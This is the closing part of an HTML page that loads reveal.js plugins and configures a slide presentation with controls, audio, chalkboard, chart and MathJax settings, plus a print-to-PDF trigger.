<!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/recorder.js"></script>-->
<!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/RecordRTC.js"></script>-->

<script src="libs/reveal.js/4.1.3/plugin/chalkboard/plugin.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/customcontrols/plugin.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/embed-tweet/plugin.js"></script>

	<script src="libs/reveal.js/4.1.3/plugin/chart/chart.min.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/chart/plugin.js"></script>

  <script>

		const printPlugins = [
			RevealNotes, 
			RevealHighlight,
			RevealMath,
			RevealAnimate,
			RevealChalkboard, 
			RevealEmbedTweet,
			RevealChart,
		];

		const plugins =  [...printPlugins,
		RevealZoom, 
		RevealSearch, 
				RevealMarkdown, 
				RevealMenu, 
				RevealFullscreen,
				RevealAnything,
				//RevealAudioSlideshow,
				//RevealAudioRecorder,
				RevealCustomControls, 
				// poll
				// question
				// seminar
				 ]


		// Also available as an ES module, see:
		// https://revealjs.com/initialization/
		Reveal.initialize({
			controls: true,
			controlsTutorial: true,
			controlsLayout: 'bottom-right',
			controlsBackArrows: 'faded',
			progress: true,
			slideNumber: false,
			//#showSlideNumber "all" "print" "speaker"
			hash: true,//#  hash: false,
			//# respondToHashChanges: true,
			//# history: false,
			keyboard: true,
			//#keyboardCondition: null,
			overview: true,
			center: true,
			touch: true,
			loop: false,
			rtl: false,
			//#navigationMode: 'default', linear grid
			shuffle: false,
			fragments: true,
			fragmentInURL: false,
			embedded: false,
			help: true,
			//#pause: true
			showNotes: false,
			autoPlayMedia: false, // TODO fix this to a nullable value
			//#preloadIframes: null. true false
			//#autoAnimate: true
			//#autoAnimateMatcher: null,
			//#autoAnimateEasing: 'ease',
			//autoAnimateDuration: 1.0,
			//#autoAnimateUnmatched: true
			//#autoAnimateStyles: []
			autoSlide: 0, // TODO fix this to a falseable value
			autoSlideStoppable: true,
			autoSlideMethod: '0',
			defaultTiming: 120,
			mouseWheel: false,
			//#previewLinks: false
			//#postMessage: true,  // TODO : this can cause issues with the vscode api ???
			//#postMessageEvents: false,
			//#focusBodyOnPageVisibilityChange: true,
			transition: 'slide',
			transitionSpeed: 'default',
			backgroundTransition: 'fade',
			//#pdfMaxPagesPerSlide: Number.POSITIVE_INFINITY,
			//#pdfSeparateFragments: true,
			//#pdfPageHeightOffset: -1,
			viewDistance: 3,
			//#mobileViewDistance: 2,
			display: 'block',
			//#hideInactiveCursor: true,
			//#hideCursorTime: 5000

			// Parallax Background
			parallaxBackgroundImage: '',
			parallaxBackgroundSize: '',
			parallaxBackgroundHorizontal: 0,
			parallaxBackgroundVertical: 0,
			
			//Presentation Size
			width: 960,
			height: 700,
			margin: 0.04,
			minScale: 0.2,
			maxScale: 2,
			disableLayout: false,

			audio: {
				prefix: 'audio/', 	// audio files are stored in the "audio" folder
				suffix: '.ogg',		// audio files have the ".ogg" ending
				textToSpeechURL: null,  // the URL to the text to speech converter
				defaultNotes: false, 	// use slide notes as default for the text to speech converter
				defaultText: false, 	// use slide text as default for the text to speech converter
				advance: 0, 		// advance to next slide after given time in milliseconds after audio has played, use negative value to not advance
				autoplay: false,	// automatically start slideshow
				defaultDuration: 5,	// default duration in seconds if no audio is available
				defaultAudios: true,	// try to play audios with names such as audio/1.2.ogg
				playerOpacity: 0.05,	// opacity value of audio player if unfocused
				playerStyle: 'position: fixed; bottom: 4px; left: 25%; width: 50%; height:75px; z-index: 33;', // style used for container of audio controls
				startAtFragment: false, // when moving to a slide, start at the current fragment or at the start of the slide
			},
			
			chalkboard: { // font-awesome.min.css must be available
					//src: "chalkboard/chalkboard.json",
					storage: "chalkboard-demo",
				},
			
			customcontrols: {
					controls: [
      						{
						  id: 'toggle-overview',
						  title: 'Toggle overview (O)',
						  icon: '<i class="fa fa-th"></i>',
						  action: 'Reveal.toggleOverview();'
						}
						,
						{ icon: '<i class="fa fa-pen-square"></i>',
						  title: 'Toggle chalkboard (B)',
						  action: 'RevealChalkboard.toggleChalkboard();'
						},
						{ icon: '<i class="fa fa-pen"></i>',
						  title: 'Toggle notes canvas (C)',
						  action: 'RevealChalkboard.toggleNotesCanvas();'
						}
				]
			},
			chart: {
					defaults: { 
						color: 'lightgray', // color of labels
						scale: { 
							beginAtZero: true, 
							ticks: { stepSize: 1 },
							grid: { color: "lightgray" } , // color of grid lines
						},
					},
					line: { borderColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ], "borderDash": [ [5,10], [0,0] ] }, 
					bar: { backgroundColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ]}, 
					pie: { backgroundColor: [ ["rgba(0,0,0,.8)" , "rgba(220,20,20,.8)", "rgba(20,220,20,.8)", "rgba(220,220,20,.8)", "rgba(20,20,220,.8)"] ]},
					radar: { borderColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ]}, 
			},
			math: {
				mathjax: 'https://cdn.jsdelivr.net/gh/mathjax/mathjax@2.7.8/MathJax.js',
				config: 'TeX-AMS_HTML-full',
				// pass other options into `MathJax.Hub.Config()`
				TeX: { Macros: { RR: "{\\bf R}" } }
				},
				anything: [ 
				{
		className: "plot",
		defaults: {width:500, height: 500, grid:true},
		initialize: (function(container, options){ options.target = "#"+container.id; functionPlot(options) })
	 },
	 {
		className: "chart",  
		initialize: (function(container, options){ container.chart = new Chart(container.getContext("2d"), options);  })
	 },
	 {
		className: "anything",
		initialize: (function(container, options){ if (options && options.initialize) { options.initialize(container)} })
	 },
					],
			// Learn about plugins: https://revealjs.com/plugins/
			plugins: (window.location.search.match(/print-pdf/gi) ? printPlugins : plugins ) 
		});
			


	    // Change chalkboard theme : 
		function changeTheme(input) {
			var config = {};
			config.theme = input.value;
			Reveal.getPlugin("RevealChalkboard").configure(config);
			input.blur();
		}

		// // Handle the message inside the webview
        // window.addEventListener('message', event => {

        //     const message = event.data; // The JSON data our extension sent

        //     switch (message.command) {
        //         case 'refactor':
        //             Reveal.toggleHelp();
        //     }
        // });

		if (window.location.search.match(/print-pdf-now/gi)) {
      		setTimeout(() => {
				window.print();
			  }, 2500);
			
    }
		

	</script>

</body>

</html>